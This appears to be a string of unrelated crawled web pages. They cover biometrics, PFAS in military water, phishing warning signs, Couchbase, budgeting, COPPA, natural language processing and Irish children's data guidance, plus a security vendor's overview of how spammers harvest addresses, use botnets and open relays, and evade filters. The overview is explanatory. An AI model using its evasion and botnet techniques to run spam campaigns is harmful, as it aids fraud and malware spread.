Biometrics have proved to be more efficient, faster and securer than traditional identification practices like ID cards, access cards, PINs and passwords, which are either possession based or knowledge based authentication factors. Biometrics, being an inherence based factor, eliminates possibility to forget or share passwords and loss or theft of ID/access cards. Implementing multi-modal biometrics or multi-factor authentication with biometrics as one of the essential factors provides even greater security, which is a common requirement in high security facilities like military setups, data centers, nuclear reactors, R&D facilities, etc.
Growing adoption of biometric recognition systems across all industries and sectors in verity of applications has paved the way to a huge commercial market for devices and solutions. Modern biometric systems have ability to connect to information systems and the network. They can share data with a remote server with centralize biometric database over the internet. This ability makes biometrics to be offered as a service over the internet. Huge success and adoption of biometric devices has induced mass production and these devices. Once expected only in high security facilities, biometric recognition systems have reached in the pocket of common population. Today, biometric recognition systems have come to the price point, where small businesses and even individuals can easily afford them for office/home security, attendance, employee/customer identification, membership management, point of sale, etc. | <urn:uuid:46fe2026-c6d6-4c6e-9b0f-05bfaee8b99a> | CC-MAIN-2022-40 | https://www.bayometric.com/biometric-devices-cost/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00141.warc.gz | en | 0.918772 | 2,677 | 2.625 | 3 |
By Tara Copp, Military Times
Bottom line: The man-made chemical compounds found in military fire-fighting foam, perfluorooctane sulfonate and perfluorooctanoic acid, known commonly as PFOS and PFOA, are hardy, toxic chemicals that do not degrade in soil or water, and can be absorbed by humans through drinking water, or through the soil or air.
The compounds even get to fetuses.
(The U.S. military is spending billions to clean up drinking water contaminated with toxic firefighting foam while continuing to use dangerous new formulas. Courtesy of The Intercept and YouTube. Posted on Feb 12, 2018.)
The study reported the chemicals have been found in umbilical cords and human breast milk.
In people, the study found that exposure could be associated with pregnancy complications, thyroid issues, liver damage, asthma, decreased responsiveness to vaccines, decreased fertility and kidney and testicular cancer.
The report’s findings on human exposure — and which looked at the whole population, not just military locations — were based on multiple studies of populations near contaminated water sources.
However, causality could not be directly established because there could have been multiple ways a person could have been exposed instead of just drinking water.
The compounds are present in everyday household goods, but are concentrated in military firefighting foam.
But the study also looked at the compounds effects on animals.
Based on 187 peer-reviewed studies where laboratory rats or other animals directly ingested the compounds, the results were more dire.
At the highest dosages, the animals experienced liver or other organ failure.
At significantly decreased exposure levels the subject rats survived but had increased prenatal loss in pregnant lab rats, and increased loss of the pups after birth.
Long-term effects at lower doses included long-term impacts to rat testes and ovaries.
The “Toxicological Profile for Perfluoroalkyls” was produced by the Department of Health and Human Services’ Agency for Toxic Substances and Disease Registry (ATSDR).
It was released Thursday for public comment. To leave a public comment on the report, the study directed respondents to go to regulations.gov.
There the study can be searched by name.
Over the last several weeks Military Times has interviewed former service members or family members who have reported cancers, miscarriages and other chronic illnesses they suspect may be tied to drinking contaminated military base water.
(A United States expert is warning that New Zealand’s acceptable levels for drinking water contamination from toxic firefighting foam chemicals are way too high. Courtesy of RNZ and YouTube. Posted on Dec 21, 2017.)
On military bases, the compounds seeped into the soil and water through the use of fire fighting foams.
After the foams were sprayed on aircraft, the remaining foam and chemicals would just be dumped onto the ground, or into a drain, multiple former airmen have told Military Times.
“It was just draining into whatever drains were around,” Paul Cyman, who served as an Air Force firefighter from 1969 to 1973.
“It would go into the storm drains. There was no containment at all.”
The report had been withheld by the administration, which reportedly called it a “public relations nightmare,” according to news reports.
After a bi-partisan push by lawmakers demanding its release, the report was released for comment Thursday.
“Based on this information, I encourage federal, state, and local environmental regulators to examine whether they are appropriately communicating the risks presented by and adequately addressing the presence of PFOS and PFOA in drinking water,” said Rep. Mike Turner, R-Ohio.
Sen. Jeanne Shaheen, D-N.H., who represents the former and contaminated Pease Air Force Base, got funding passed in the 2018 and 2019 defense bills for a nationwide study that will look at eight to 10 military bases to study the effects of PFOS and PFOA exposure.
The 2019 bill also supports creation of a national registry for service members, their families and the public to report exposure to the contaminants.
“I’m glad the administration heeded the bipartisan call in Congress and finally published these reports,” Shaheen said.
(Learn More. It’s in rain gear, cookware, carpets, firefighting foam, the drinking water of at least six million people, and more likely than not, it’s in your blood. Learn more about PFAS chemicals and what you can do to clean up PFAS-contaminated drinking water in your community. Courtesy of ToxicsAction and YouTube. Posted on Mar 29, 2018.) | <urn:uuid:dc49c006-06ad-480d-829d-6f1df4dc0a1e> | CC-MAIN-2022-40 | https://americansecuritytoday.com/withheld-study-base-water-toxins-not-good-learn-videos/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00141.warc.gz | en | 0.966509 | 975 | 2.90625 | 3 |
Why Phishing Awareness is Vital to Organizations
Successful phishing attacks give attackers a foothold in corporate networks, access to vital information such as intellectual property, and in some cases money. The question is how to generate phishing awareness and train your team to spot a phishing email. There are numerous types of phishing, but ultimately it is any type of attack by email that is designed to result in the recipient taking a specific course of action. This could be clicking a link that leads to a compromised website, opening a malware-laden attachment, or divulging valuable information such as usernames and passwords.
Look for a Hook in Phishing Emails
Increasingly, phishing emails are carefully researched and contrived to target specific recipients. Given the number and intensity of data breaches in recent years there is a wealth of information available to phishers to use when honing their prose, making it even tougher to spot signs of a phishing email and discern fact from fiction.
The increasing sophistication of phishing attacks makes it difficult for technology to identify email-borne threats and block them. However, phishing emails typically have a range of “hooks” which, if spotted by the recipient, can prevent the attack from being successful. The following are some of the hooks – or signs of a phishing email – that can indicate an email is not as genuine as it appears to be.
10 Most Common Signs of a Phishing Email
1. An Unfamiliar Tone or Greeting
The first thing that usually arouses suspicion when reading a phishing message is that the language isn’t quite right – for example, a colleague is suddenly over familiar, or a family member is a little more formal. For instance, if I personally were to receive an email from Cofense’s CTO that began with “Dear Scott,” that would immediately raise a red flag. In all of our correspondence over the years, he has never begun an email with that greeting so it would feel wrong. If a message seems strange, it’s worth looking for other indicators that this could be a phishing email.
2. Grammar and Spelling Errors
One of the more common signs of a phishing email is bad spelling and the incorrect use of grammar. Most businesses have the spell check feature on their email client turned on for outbound emails. It is also possible to apply autocorrect or highlight features on most web browsers. Therefore, you would expect emails originating from a professional source to be free of grammar and spelling errors.
3. Inconsistencies in Email Addresses, Links & Domain Names
Another simple way to identify a potential phishing attack is to look for discrepancies in email addresses, links and domain names. For example, it is worth checking against previous correspondence that originating email addresses match. If a link is embedded in the email, hover the pointer over the link to verify what ‘pops up’. If the email is allegedly from PayPal, but the domain of the link does not include “paypal.com,” that’s a huge giveaway. If the domain names don’t match, don’t click.
4. Threats or a Sense of Urgency
Emails that threaten negative consequences should always be treated with suspicion. Another tactic is to use a sense of urgency to encourage, or even demand, immediate action in a bid to fluster the receiver. The scammer hopes that by reading the email in haste, the content might not be examined thoroughly so other inconsistencies associated with a phishing campaign may pass undetected.
5. Suspicious Attachments
If an email with an attached file is received from an unfamiliar source, or if the recipient did not request or expect to receive a file from the sender of the email, the attachment should be opened with caution. If the attached file has an extaension commonly associated with malware downloads (.zip, .exe, .scr, etc.) – or has an unfamiliar extension – recipients should flag the file to be virus-scanned before opening.
Teach users to identify real phish.
Discover how Cofense PhishMe educates users on the real phishing tactics your company faces.Get a Demo
6. Unusual Request
Leading on from the point above, if the email is asking for something to be done that is not the norm, then that too is an indicator that the message is potentially malicious. For example, if an email claims to be from the IT team asking for a program to be installed, or a link to patch the PC followed, yet this type of activity is typically handled centrally, that’s a big clue that you have received a phishing email and you should not to follow the instructions.
7. Short and Sweet
While many phishing emails will be stuffed with details designed to offer a false security, some phishing messages have also been sparse in information hoping to trade on their ambiguity. For example, a scammer that spoofs an email from Jane at a company that is a preferred vendor emailing the company once or twice weekly, has the vague message ‘here’s what you requested’ and an attachment titled ‘additional information’ in hopes they’ll get lucky.
8. Recipient Did Not Initiate the Conversation
Because phishing emails are unsolicited, an often-used hook is to inform the recipient he or she has won a prize, will qualify for a prize if they reply to the email, or will benefit from a discount by clicking on a link or opening an attachment. In cases where the recipient did not initiate the conversation by opting in to receive marketing material or newsletters, there is a high probability that the email is suspect.
9. Request for Credentials, Payment Information or Other Personal Details
One of the most sophisticated types of phishing emails is when an attacker has created a fake landing page that recipients are directed to by a link in an official looking email. The fake landing page will have a login box or request that a payment is made to resolve an outstanding issue. If the email was unexpected, recipients should visit the website from which the email has supposedly come by typing in the URL – rather than clicking on a link – to avoid entering their login credentials of the fake site or making a payment to the attacker.
10. See Something, Say Something
Identification is the first step in the battle against phishers. However chances are if one employee is receiving phishing emails, others are as well. Organizations need to promote phishing awareness and condition employees to report signs of a phishing email – it’s the old adage of “If you see something, say something,” to alert security or the incident response team.
A complication of this is then sifting through the various reports to eliminate false positives. So, how can an organization stop phishing emails and identify phishing attacks? One method is to prioritize alerts received from users who have a history of positively identifying phishing attacks. These employee-sourced, prioritized reports provide the incident response (IR) team and security operations analysts with the information needed to rapidly respond to potential phishing attacks and mitigate the risk from those that may fall prey to them. | <urn:uuid:c9ef08ef-1ac3-424a-852d-839d118cbd2a> | CC-MAIN-2022-40 | https://cofense.com/knowledge-center/signs-of-a-phishing-email/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00141.warc.gz | en | 0.945459 | 1,495 | 2.609375 | 3 |
Couchbase is a distributed database management system created by the company Couchbase, Inc. Couchbase stores data in RAM for faster access times, but also replicates that data across servers for redundancy and parallelization. Data in the database is stored as documents and can be queried via an index or key/value pairs.
- With Couchbase, one can start with small server configurations and add more servers as needed
- Businesses do not have to worry about purchasing higher-end servers upfront, which would lead to wasted money if they eventually did not need them
- Couchbase servers can be added, removed, and scaled up or down at any time
- Built for scaling with horizontal scalability of servers and nearly linear performance
- Updating data is simple, either by direct assignment or via an index
- Data inserts are fast
- Couchbase indexes are very flexible, allowing for multiple indexes with various options on each index
- The performance of Couchbase has nearly linear scaling, so doubling the number of servers quadruples performance
- Disaster recovery is built into Couchbase
- Data can be replicated across multiple Couchbase clusters for load balancing and failover.
- Couchbase is ideal for businesses needing a database that can scale with their company.
- Document database for fast access to data via key/value pairs or full documents
- Simple, flexible indexes with multiple options on each index
- Data can be replicated across multiple clusters for load balancing and failover | <urn:uuid:9e4e42d4-a78e-48ce-9787-413801835bb9> | CC-MAIN-2022-40 | https://data443.com/data_security/couchbase/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00141.warc.gz | en | 0.890484 | 304 | 2.609375 | 3 |
A budget is a systematic method of allocating financial, physical and human resources to achieve strategic goals. Companies develop budgets in order to monitor progress toward their goals, help control spending, and predict cash flow and profit.
The most effective budgets are those that:
- Communicate and support strategic goals.
- Identify risks in relation to the company's long-term strategy.
- Provide information to help management make better decisions.
- Facilitate goal setting and measurement.
- Deliver consistent realistic figures companywide.
- Accommodate changing business conditions.
The goal of companies that apply best practices is to develop budgets that give managers a well-designed tool to manage effectively. To do this, companies use technology effectively; just as important, they develop procedures that work in their industry and with the culture of their company.
The central challenge to budget developers is that by trying to map the future for a company, they are attempting something that can never be done with perfect precision. With a greater number of companies competing in multiple, global markets, and with economic and technological change accelerating, companies need to develop budgets that strive for precision but also can accommodate business conditions that will certainly change.
Important benefits of improving the budgeting process include:
- Better companywide understanding of strategic goals
- Better support of initiatives supporting those goals
- The ability to respond more quickly and forcefully to competition
- Cost savings, through better practices in every unit that does budgeting
Applying performance measures to the budgeting process is also key to process improvement. Performance measures are the "vital signs" of an organization. Quantitative measures of performance provide management with insight into company performance and highlight opportunities for improvement. Such measures provide a company with the information needed to benchmark with another company, compare performance with industry standards and averages, and track any progress in performance improvement over time. By using performance measures, managers and workers understand the outcome of their efforts and how those efforts affect the rest of the organization.
To be meaningful, performance measures must be quantified: an act of measurement is required, one that can be performed reliably and consistently with a basis in fact, not opinion. "Good" and "fast" are not adequate performance measures. "Number of defects" and "time for order processing" are acceptable measures, if they are controllable — that is, if the people performing the work can affect the outcome. In addition to being quantifiable and controllable, to be truly effective, performance measures must also be:
- Aligned with company objectives
- Supportive of continuous improvement
- Reported consistently and promptly
Performance measures can be cost-based, quality-based or time-based. Cost-based measures cover the financial side of performance. Quality-based measures assess how well an organization's products or services meet customer needs. Time-based measures focus on how quickly the organization can respond to outside influences, from customer orders to changes in competition. Focusing attention simultaneously on cost, quality and time can optimize performance for an entire process and ultimately an entire organization.
A few cost-focused performance measures for the budgeting process include:
- The total cost of financial budgeting and planning as a percentage of revenue.
- A higher-than-average ratio may be due to higher compensation to staff involved when preparing and analyzing the budget or to excess staffing in the budget process. Other reasons for a higher ratio include a process that is highly decentralized or one that uses technology that needs updating. Some companies, however, will have a higher ratio because their revenue is below the benchmark group average. A lower-than-average ratio may be due to lower compensation rates for budget preparation staff or a staff that is less highly skilled. However, a company that uses technology efficiently will also have a lower-than-average ratio, as well as a company with revenue above the benchmark group average.
- The number of full-time equivalent (FTE) staff, as a percentage of total staff, devoted to budgeting.
- FTE is defined as equal to 40 hours.
- The number of budgets produced annually.
- A higher number of budgets indicates that more time and resources are being spent on budgeting.
- Some reasons that a company might have a higher-than-average number of budgets:
- Preparing different types of budgets for the same financial entity
- Creating budgets that include too much detail
- Requiring many revisions of budgets
- By contrast, a company might have a lower-than-average number of budgets due to the following factors: synchronizing budgets for each entity, simplifying required details, and providing clear guidelines on strategies and assumptions so that less revision is required.
Learn more about the budgeting process through the following tools on KnowledgeLeader: | <urn:uuid:b114d84a-b5c0-43fa-ad12-3360d412394a> | CC-MAIN-2022-40 | https://info.knowledgeleader.com/how-to-determine-the-most-effective-budgeting-process | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00341.warc.gz | en | 0.955607 | 975 | 2.84375 | 3 |
Between geolocation smartphone apps, social media updates and web traffic analysis, the online world probably knows a lot about you. While there aren’t too many strict regulations regarding online privacy for adults, the United States does have some requirements for websites aimed at children. Several companies, including McDonalds and General Mills, have recently been accused of violating the U.S. Children’s Online Privacy Protection Act (COPPA), according to a recent Marketplace Tech article.”Basically the idea is that a kid goes onto the website, is playing a fun game, then is prompted hey, why don’t you email any of your friends that might want to get here, and so the idea is to drive traffic to the website,” said Ryan Calo, an assistant professor at the University of Washington School of Law, who was quoted in the article.
The problem is that some of those website practices fall into a legal grey area, according to the article. Although COPPA restricts the ways in which websites can collect and use personal information of individuals under the age of 13, it doesn’t have clear guidelines for sites that encourage children to email other kids.
The article also highlighted a larger problem: Most adults, as well as children, don’t fully understand how companies are collecting and using their data. This means few internet users leverage solutions such as application control to prevent apps from collecting their private data.
As technology advances, the amount of information organizations can collect on consumers grows, along with privacy concerns. As a recent Forbes article pointed out, consumer devices are collecting information even while their owners sleep – smartphones report on user locations, the electric company records power usage, etc. The big question is whether these data collection efforts are justified or if companies are taking things too far.
Do companies collect too much information about their customers? Should governments be able to design stricter online privacy laws for adults? | <urn:uuid:97558841-5209-45a9-8573-d29bc866ade9> | CC-MAIN-2022-40 | https://www.faronics.com/news/blog/companies-accused-of-violating-coppa | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00341.warc.gz | en | 0.953306 | 391 | 2.609375 | 3 |
A virtual machine is an abstraction of a physical computer. Virtual machines run on physical computers and can be related to a “computer in a computer.” This allows public cloud providers massive economies of scale because they are able to launch virtual servers for many customers without having to purchase physical computers for each virtual machine. Virtual machines enable cloud computing services like AWS EC2 to exist. Most resources on the cloud are virtualized, such as computing resources, networks, and serverless functions.
in other words
A custom cloud that can be used just for you and your business. | <urn:uuid:cf63aa7a-91c5-455b-9963-1b66b3368276> | CC-MAIN-2022-40 | https://www.intricately.com/glossary/virtual-machine | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00341.warc.gz | en | 0.883595 | 123 | 2.953125 | 3 |
Spammers use dedicated programs and technologies to generate and transmit the billions of spam emails which are sent every day (from 60% to 90% of all mail traffic). This requires significant investment of both time and money.
Spammer activity can be broken down into the following steps:
- Collecting and verifying recipient addresses; sorting the addresses into target groups
- Creating platforms for mass mailing (servers and/or individual computers)
- Writing mass mailing programs
- Marketing spammer services
- Developing texts for specific campaigns
- Sending spam
Each step in the process is carried out independently of the others.
Collecting and verifying addresses; creating address lists
The first step in running a spammer business is creating an email database. Entries do not only consist of email addresses; each entry may contain additional information such as geographical location, sphere of activity (for corporate entries) or interests (for personal entries). A database may contain addresses from specific mail providers, such as Yandex, Hotmail, AOL etc. or from online services such as PayPal or eBay.
There are a number of methods spammers typically use to collecting addresses:
- Guessing addresses using common combinations of words and numbers – john@, destroyer@, alex-2@
- Guessing addresses by analogy – if there is a verified email@example.com , then it’s reasonable to search for a firstname.lastname@example.org, @aol.com, Paypal etc.
- Scanning public resources including web sites, forums, chat rooms, Whois databases, Usenet News and so forth for word combinations (i.e. email@example.com, with word3 being a top-level domain such as .com or .info)
- Stealing databases from web services, ISPs etc.
- Stealing users’ personal data using computer viruses and other malicious programs
Topical databases are usually created using the third method, since public resources often contain information about user preferences along with personal information such as gender, age etc. Stolen databases from web services and ISPs may also include such information, enabling spammers to further personalize and target their mailings.
Stealing personal data such as mail client address books is a recent innovation, but is proving to be highly effective, as the majority of addresses will be active. Unfortunately, recent virus epidemics have demonstrated that there are still a great many systems without adequate antivirus protection; this method will continue to be successfully used until the vast majority of systems have been adequately secured.
Once email databases have been created, the addresses need to be verified before they can be sold or used for mass mailing.
- Initial test mailing. A test message with a random text which is designed to evade spam filters is sent to the entire address list. The mail server logs are analysed for active and defunct addresses and the database is cleaned accordingly.
- Once addresses have been verified, a second message is often sent to check whether recipients are reading messages. For instance, the message may contain a link to a picture on a designated web server. Once the message is opened, the picture is downloaded automatically and the website will log the address as active.
- A more successful method of verifying if an address is active is a social engineering technique. Most end users know that they have the right to unsubscribe from unsolicited and/or unwanted mailings. Spammers take advantage of this by sending messages with an ‘unsubscribe’ button. Users click on the unsubscribe link and a message purportedly unsubscribing the user is sent. Instead, the spammer receives confirmation that the address in question is not only valid but that the user is active.
However, none of these methods are foolproof and any spammer database will always contain a large number of inactive addresses.
Creating platforms for mass mailing
Today’s spammers use one of these three mass mailing methods:
- Direct mailing from rented servers
- Using open relays and open proxies – servers which have been poorly configured and are therefore freely accessible
- Bot networks – networks of zombie machines infected with malware, usually a Trojan, which allow spammers to use the infected machines as platforms for mass mailings without the knowledge or consent of the owner.
Renting servers is problematic, since anti-spam organizations monitor mass mailings and are quick to add servers to blacklists. Most ISPs and anti-spam solutions use blacklists as one method to identify spam: this means that once a server has been blacklisted, it can no longer be used by spammers.
Using open relay and open proxy servers is also time consuming and costly. First spammers need to write and maintain robots that search the Internet for vulnerable servers. Then the servers need to be penetrated. However, very often, after a few successful mailings, these servers will also be detected and blacklisted.
As a result, today most spammers prefer to create or purchase bot networks. Professional virus writers use a variety of methods to create and maintain these networks:
- Pirate software is also a favorite vehicle for spreading malicious code. Since these programs are often spread via file-sharing networks, such as Kazaa, eDonkey and others, the networks themselves are penetrated and even users who do not use pirate software will be at risk.
- Exploiting vulnerabilities in Internet browsers, primarily MS Internet Explorer. There are number of browser vulnerabilities in browsers which make it possible to penetrate a computer from a site being viewed by the machine’s user. Virus writers exploit such holes and write Trojans and other malware to penetrate victim machines, giving malware owners full access to, and control over, these infected machines. For instance, pornographic sites and other frequently visited semi-legal sites are often infested with such malicious programs. In 2004 a large number of sites running under MS IIS were penetrated and infected with Trojans. These Trojans then attacked the machines of users who believed that these sites were safe.
- Using email worms and exploiting vulnerabilities in MS Windows services to distribute and install Trojans: MS Windows systems are inherently vulnerable, and hackers and virus writers are always ready to exploit this. Independent tests have demonstrated that a Windows XP system without either a firewall or antivirus software will be attacked within approximately 20 minutes of being connected to the Internet.
Modern malware is rather technologically sophisticated – the authors of these programs spare neither time nor effort to make detection of their creations as difficult as possible. Trojan components can behave as Internet browsers asking websites for instructions – whether to launch a DoS attack or to start spam mailing, etc. (the instructions may even contain information about the time and the ‘place’ of the next instruction). IRC is also used to get instructions.
An average mass mailing contains about a million messages. The objective is to send the maximum number of messages in the minimum possible time. There is a limited window of opportunity before anti-spam vendors update signature databases to deflect the latest types of spam.
Sending a large number of messages within a limited timeframe requires appropriate technology. There are a number of resources available that are developed and used by professional spammers. These programs need to be able to:
- Send mail over a variety of channels including open relays and individual infected machines.
- Create dynamic texts.
- Spoof legitimate message headers
- Track the validity of an email address database.
- Detect whether individual messages are delivered or not and to resend them from alternative platforms if the original platform has been blacklisted.
These spammer applications are available as subscription services or as a stand-alone application for a one-off fee.
Marketing spammer services
Strangely enough, spammers advertise their services using spam. In fact, the advertising which spammers use to promote their services constitutes a separate category of spam. Spammer-related spam also includes advertisements for spammer applications, bot networks and email address databases.
Creating the message body
Today, anti-spam filters are sophisticated enough to instantly detect and block a large number of identical messages. Spammers therefore now make sure that mass mailings contain emails with almost identical content, with the texts being very slightly altered. They have developed a range of methods to mask the similarity between messages in each mailing:
- Inclusion of random text strings, words or invisible text. This may be as simple as including a random string of words and/or characters or a real text from a real source at either the beginning or the end of the message body. An HTML message may contain invisible text – tiny fonts or text which is colored to match the background. All of these tricks interfere with the fuzzy matching and Bayesian filtering methods used by anti-spam solutions. However, anti-spam developers have responded by developing quotation scanners, detailed analysis of HTML encoding and other techniques. In many cases spam filters simply detect that such tricks have been used in a message and automatically flag it as spam.
- Graphical spam. Sending text in graphics format hindered automatic text analysis for a period of time, though today a good anti-spam solution is able to detect and analyze incoming graphics
- Dynamic graphics. Spammers are now utilizing complicated graphics with extra information to evade anti-spam filters.
- “Fragmented” Images. Actually the image consists of several smaller images, but a user sees it as complete text. Animation is just another type of fragmentation whereby the image is split into frames that are layered over each other, with the end result being complete text.
- Paraphrasing texts. A single advertisement can be endlessly rephrased, making each individual message appear to be a legitimate email. As a result, anti-spam filters have to be configured using a large number of samples before such messages can be detected as spam.
A good spammer application will utilize all of the above methods, since different potential victims use different anti-spam filters. Using a variety of techniques ensures that a commercially viable number of messages will escape filtration and reach the intended recipients.
Spam and psychology
Sending messages quickly and getting them past all filters to the recipient is an important part of the spamming process, but there’s more to it than that. Spammers also need to ensure that a user will read the message and do what the spammer wants (i.e., call a designated number, click on a link, etc.).
In 2006, spammers continued to master the psychological methods used to manipulate spam recipients. In particular, in order to hook a user into reading an email, spammers tried to persuade recipients that messages were actually personal correspondence, not spam. At the beginning of the year, spammers mainly used primitive approaches, such as adding RE or FW at the beginning of a subject line to indicate that a message was a reply to a previous email or that it had been sent from a known address. By the middle of the year, spammers had begun to use more subtle tactics.
Spammers began working on their message texts. Today, some spam message texts are stylistically and lexically designed to look like personal correspondence. There are some convincing examples that might even fool an expert at first glance, not to mention less experienced users. This kind of spam is often highly impersonal (it doesn’t address anyone in particular or uses words like ‘girlfriend’ or ‘sweety’, etc.) in order to create the illusion that the email was intended only for the recipient. Sometimes names are used in faked personal correspondence. Whatever the case, the user’s curiosity will be piqued and s/he may well read it to find out who it came from, or if s/he should forward it, etc.
Another spammer trick utilizing social engineering technique is the use of hot news themes (sometimes thought up by the spammers themselves) in spam messages.
The structure of a spammer business
The steps listed above require a team of different specialists or outsourcing certain tasks. The spammers themselves, i.e. the people who run the business and collect money from clients, usually purchase or rent the applications and services they need to conduct mass mailings.
Spammers are divided into professional programmers and virus writers who develop and implement the software needed to send spam, and amateurs who may not be programmers or IT people, but simply want to make some easy money.
The spam market today is valued at approximately several hundred million dollars annually. How is this figure reached? Divide the number of messages detected every day by the number of messages in a standard mailing. Multiply the result by the average cost of a standard mailing: 30 billion (messages) divided by 1 million (messages) multiplied US $100 multiplied by 365 (days) gives us an estimated annual turnover of $1095 million.
Such a lucrative market encourages full-scale companies which run the entire business cycle in-house in a professional and cost-effective manner. There are also legal issues: collecting personal data and sending unsolicited correspondence is currently illegal in most countries of the world. However, the money is good enough to attract the interest of people who willing to take risks and potentially make a fat profit.
The spam industry is therefore likely to follow in the footsteps of other illegal activities: go underground and engage in a prolonged cyclic battle with law enforcement agencies. | <urn:uuid:251ce389-668c-468b-bbd9-4b5927a2cc85> | CC-MAIN-2022-40 | https://encyclopedia.kaspersky.com/knowledge/contemporary-spammer-technologies/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00341.warc.gz | en | 0.930799 | 2,762 | 2.78125 | 3 |
NLP vs. NLU vs. NLG: the differences between three natural language processing concepts
While natural language processing (NLP), natural language understanding (NLU), and natural language generation (NLG) are all related topics, they are distinct ones. At a high level, NLU and NLG are just components of NLP. Given how they intersect, they are commonly confused within conversation, but in this post, we’ll define each term individually and summarize their differences to clarify any ambiguities.
What is natural language processing?
Natural language processing, which evolved from computational linguistics, uses methods from various disciplines, such as computer science, artificial intelligence, linguistics, and data science, to enable computers to understand human language in both written and verbal forms. While computational linguistics has more of a focus on aspects of language, natural language processing emphasizes its use of machine learning and deep learning techniques to complete tasks, like language translation or question answering. Natural language processing works by taking unstructured data and converting it into a structured data format. It does this through the identification of named entities (a process called named entity recognition) and identification of word patterns, using methods like tokenization, stemming, and lemmatization, which examine the root forms of words. For example, the suffix -ed on a word, like called, indicates past tense, but it has the same base infinitive (to call) as the present tense verb calling.
While a number of NLP algorithms exist, different approaches tend to be used for different types of language tasks. For example, hidden Markov chains tend to be used for part-of-speech tagging. Recurrent neural networks help to generate the appropriate sequence of text. N-grams, a simple language model (LM), assign probabilities to sentences or phrases to predict the accuracy of a response. These techniques work together to support popular technology such as chatbots, or speech recognition products like Amazon’s Alexa or Apple’s Siri. However, its application has been broader than that, affecting other industries such as education and healthcare.
What is natural language understanding?
Natural language understanding is a subset of natural language processing, which uses syntactic and semantic analysis of text and speech to determine the meaning of a sentence. Syntax refers to the grammatical structure of a sentence, while semantics alludes to its intended meaning. NLU also establishes a relevant ontology: a data structure which specifies the relationships between words and phrases. While humans naturally do this in conversation, the combination of these analyses is required for a machine to understand the intended meaning of different texts.
Our ability to distinguish between homonyms and homophones illustrates the nuances of language well. For example, let’s take the following two sentences:
- Alice is swimming against the current.
- The current version of the report is in the folder.
In the first sentence, the word, current is a noun. The verb that precedes it, swimming, provides additional context to the reader, allowing us to conclude that we are referring to the flow of water in the ocean. The second sentence uses the word current, but as an adjective. The noun it describes, version, denotes multiple iterations of a report, enabling us to determine that we are referring to the most up-to-date status of a file.
These approaches are also commonly used in data mining to understand consumer attitudes. In particular, sentiment analysis enables brands to monitor their customer feedback more closely, allowing them to cluster positive and negative social media comments and track net promoter scores. By reviewing comments with negative sentiment, companies are able to identify and address potential problem areas within their products or services more quickly.
What is natural language generation?
Natural language generation is another subset of natural language processing. While natural language understanding focuses on computer reading comprehension, natural language generation enables computers to write. NLG is the process of producing a human language text response based on some data input. This text can also be converted into a speech format through text-to-speech services.
NLG also encompasses text summarization capabilities that generate summaries from in-put documents while maintaining the integrity of the information. Extractive summarization is the AI innovation powering Key Point Analysis used in That’s Debatable.
Initially, NLG systems used templates to generate text. Based on some data or query, an NLG system would fill in the blank, like a game of Mad Libs. But over time, natural language generation systems have evolved with the application of hidden Markov chains, recurrent neural networks, and transformers, enabling more dynamic text generation in real time.
As with NLU, NLG applications need to consider language rules based on morphology, lexicons, syntax and semantics to make choices on how to phrase responses appropriately. They tackle this in three stages:
- Text planning: During this stage, general content is formulated and ordered in a logical manner.
- Sentence planning: This stage considers punctuation and text flow, breaking out content into paragraphs and sentences and incorporating pronouns or conjunctions where appropriate.
- Realization: This stage accounts for grammatical accuracy, ensuring that rules around punctation and conjugations are followed. For example, the past tense of the verb run is ran, not runned.
NLP vs NLU vs. NLG summary
- Natural language processing (NLP) seeks to convert unstructured language data into a structured data format to enable machines to understand speech and text and formulate relevant, contextual responses. Its subtopics include natural language processing and natural language generation.
- Natural language understanding (NLU) focuses on machine reading comprehension through grammar and context, enabling it to determine the intended meaning of a sentence.
- Natural language generation (NLG) focuses on text generation, or the construction of text in English or other languages, by a machine and based on a given dataset.
Infuse your data for AI
Natural language processing and its subsets have numerous practical applications within today’s world, like healthcare diagnoses or online customer service.
Explore some of the latest NLP research at IBM or take a look at some of IBM’s product offerings, like Watson Natural Language Understanding. Its text analytics service offers insight into categories, concepts, entities, keywords, relationships, sentiment, and syntax from your textual data to help you respond to user needs quickly and efficiently. Help your business get on the right track to analyze and infuse your data at scale for AI. | <urn:uuid:00cba12c-a469-4ac7-be4a-fd66fb9abea6> | CC-MAIN-2022-40 | https://www.ibm.com/blogs/watson/2020/11/nlp-vs-nlu-vs-nlg-the-differences-between-three-natural-language-processing-concepts/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00341.warc.gz | en | 0.913562 | 1,333 | 3.09375 | 3 |
One of every five people (20.5%) in Ireland are children under the age of 14. This constitutes the highest proportion of children in the EU, where the average was 15.2% in 2019. Ireland’s proportion of young people under the age of 30 is also the highest in the EU, at 39%. It’s an influential figure for Irish policy makers and regulators, who have strengthened their approach to protection of children’s personal data in recent years. This greater emphasis on children’s rights is due to a number of additional intersecting dynamics including EU law, child abuse scandals, a rise in cyberbullying, and a growing consensus that children face heightened digital risks. These dynamics have also informed the planned establishment of an Online Safety Commissioner, currently advancing as part of the Online Safety and Media Regulation Bill just published and currently receiving strong media attention.
Together with the Irish DPC role as lead regulator for many leading technology and social media companies, these legal and cultural headwinds provide the context within which the DPC aims to develop strong child data protection standards.
Following extensive public consultation, with experts as well as school children, the DPC has issued comprehensive guidance on the processing of children’s data. Entitled “Children Front and Centre: Fundamentals for a Child-Oriented Approach to Data Processing,” the guidance sets out 14 principles (referred to as “the Fundamentals”) for organizations engaged in processing the personal data of children.
In addition to the usual GDPR expectations, the specific Fundamentals also include:
